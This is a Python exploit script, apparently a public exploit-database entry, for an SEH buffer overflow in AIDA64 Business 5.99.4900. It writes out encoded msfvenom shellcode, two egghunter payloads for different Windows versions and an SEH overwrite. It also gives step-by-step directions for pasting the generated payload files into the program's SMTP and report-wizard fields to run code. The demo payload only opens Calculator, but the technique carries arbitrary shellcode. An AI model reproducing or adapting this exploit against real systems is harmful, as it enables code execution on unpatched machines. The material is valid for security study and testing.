AIDA64 Business 5.99.4900 SEH Buffer Overflow

`#!/usr/bin/python #  
# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter) #  
# Date: 2019-04-01 #  
# Vendor Homepage: https://www.aida64.com #  
# Software Link: https://www.aida64.com/downloads #  
# Mirror Link : https://www.softpedia.com/get/System/System-Info/AIDA64-Business-Edition.shtml #  
# Exploit Author: Peyman Forouzan #  
# Tested Version: 5.99.4900 #  
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #  
# Special Thanks to my wife #  
# The program has SEH Buffer Overflow in several places.(this code show one of them) #  
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in #  
# (Extreme, Engineer, Network Audit) Editions. #  
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900 #  
# But the stack pivots in Business Edition are different. #  
# Note 2 : All the old versions of the program that are available on the sites like soft32.com, #  
# or in https://www.aida64.com/downloads/archive #  
# have the same vulnerabily in different offsets (for example version 5.70.3800 ) #  
# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. #  
# Steps : #  
# 1- Run python code : Aida64-Business.py ( Three files are created ) #  
# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #  
# into "Display name" --> Ok #  
# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #  
# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next #  
# --> Wait a minute --> Shellcode (Calc) open #  
#---------------------------------------------------------------------------------------------------------#  
  
#------------------------------------ EGG Shellcode Generation ---------------------------------------  
  
bufsize = 292  
  
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg  
egg = "w00tw00t"  
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"  
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"  
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"  
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"  
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"  
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"  
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"  
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"  
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"  
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"  
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"  
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"  
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"  
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"  
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"  
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"  
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"  
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"  
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"  
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"  
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"  
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"  
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"  
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"  
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"  
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"  
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"  
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"  
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"  
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"  
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"  
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"  
  
f = open ("egg.txt", "w")  
f.write(egg)  
f.close()  
  
#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------  
egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"  
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"  
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"  
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"  
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"  
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"  
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"  
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"  
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"  
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"  
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"  
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"  
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"  
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"  
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"  
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"  
  
egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"  
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"  
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"  
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"  
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"  
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"  
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"  
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"  
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"  
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"  
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"  
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"  
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"  
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"  
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"  
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"  
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"  
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"  
  
jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back  
nseh = "\xeb\xf9\x90\x90" # jmp Short back  
seh = "\x50\x15\x40" # Overwrite Seh - Golden Pivot !! - Works on all Editions  
  
buffer = egghunter  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)  
f = open ("egghunter-winxp-win7.txt", "w")  
print "[+] File created!"  
f.write(buffer)  
f.close()  
  
buffer = egghunter10  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)  
f = open ("egghunter-win10.txt", "w")  
print "[+] File created!"  
f.write(buffer)  
f.close()  
`